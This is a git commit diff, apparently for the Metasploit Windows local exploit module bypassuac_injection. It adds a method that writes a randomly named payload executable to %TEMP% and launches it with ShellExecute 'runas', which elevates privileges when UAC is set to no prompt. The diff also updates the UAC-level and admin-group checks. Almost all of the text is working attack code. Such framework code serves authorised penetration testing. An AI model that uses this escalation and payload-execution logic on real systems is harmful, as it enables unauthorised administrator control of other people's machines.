Update bypassuac_injection inline with latest privs lib
parent
e6a2a1006f
commit
6fdf5cab15
|
@ -12,7 +12,6 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
Rank = ExcellentRanking
|
Rank = ExcellentRanking
|
||||||
|
|
||||||
include Exploit::EXE
|
include Exploit::EXE
|
||||||
include Post::Common
|
|
||||||
include Post::File
|
include Post::File
|
||||||
include Post::Windows::Priv
|
include Post::Windows::Priv
|
||||||
|
|
||||||
|
@ -52,9 +51,20 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def runas_method
|
||||||
|
payload = generate_payload_exe
|
||||||
|
payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
|
||||||
|
tmpdir = expand_path("%TEMP%")
|
||||||
|
tempexe = tmpdir + "\\" + payload_filename
|
||||||
|
write_file(tempexe, payload)
|
||||||
|
print_status("Uploading payload: #{tempexe}")
|
||||||
|
session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
|
||||||
|
print_status("Payload executed")
|
||||||
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
|
||||||
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin?
|
fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system?
|
||||||
|
|
||||||
#
|
#
|
||||||
# Verify use against Vista+
|
# Verify use against Vista+
|
||||||
|
@ -65,25 +75,27 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
end
|
end
|
||||||
|
|
||||||
if is_uac_enabled?
|
if is_uac_enabled?
|
||||||
vprint_status "UAC is Enabled, checking level..."
|
print_status "UAC is Enabled, checking level..."
|
||||||
else
|
else
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
if is_in_admin_group?
|
||||||
"UAC is not enabled, no reason to run module, exiting...\r\nRun exploit/windows/local/ask to elevate"
|
fail_with(Exploit::Failure::Unknown, "UAC is disabled and we are in the admin group so something has gone wrong...")
|
||||||
)
|
else
|
||||||
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
case get_uac_level
|
case get_uac_level
|
||||||
when UACPromptCredsIfSecureDesktop, UACPromptConsentIfSecureDesktop, UACPromptCreds, UACPromptConsent
|
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP, UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP, UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
fail_with(Exploit::Failure::NotVulnerable,
|
||||||
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
"UAC is set to 'Always Notify'\r\nThis module does not bypass this setting, exiting..."
|
||||||
)
|
)
|
||||||
when UACDefault
|
when UAC_DEFAULT
|
||||||
print_good "UAC is set to Default"
|
print_good "UAC is set to Default"
|
||||||
vprint_status "BypassUAC can bypass this setting, continuing..."
|
print_good "BypassUAC can bypass this setting, continuing..."
|
||||||
when UACNoPrompt
|
when UAC_NO_PROMPT
|
||||||
fail_with(Exploit::Failure::NotVulnerable,
|
print_warning "UAC set to DoNotPrompt - using ShellExecute 'runas' method instead"
|
||||||
"UAC is not enabled, no reason to run module\r\nRun exploit/windows/local/ask to elevate"
|
runas_method
|
||||||
)
|
return
|
||||||
end
|
end
|
||||||
|
|
||||||
# Check if you are an admin
|
# Check if you are an admin
|
||||||
|
@ -97,13 +109,11 @@ class Metasploit3 < Msf::Exploit::Local
|
||||||
if admin_group
|
if admin_group
|
||||||
print_good('Part of Administrators group! Continuing...')
|
print_good('Part of Administrators group! Continuing...')
|
||||||
else
|
else
|
||||||
print_error('Not in admins group, cannot escalate with this module')
|
fail_with(Exploit::Failure::NoAccess, "Not in admins group, cannot escalate with this module")
|
||||||
print_error('Exiting...')
|
|
||||||
return
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
if get_integrity_level == LowIntegrityLevel
|
if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
|
||||||
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
fail_with(Exploit::Failure::NoAccess, "Cannot BypassUAC from Low Integrity Level")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue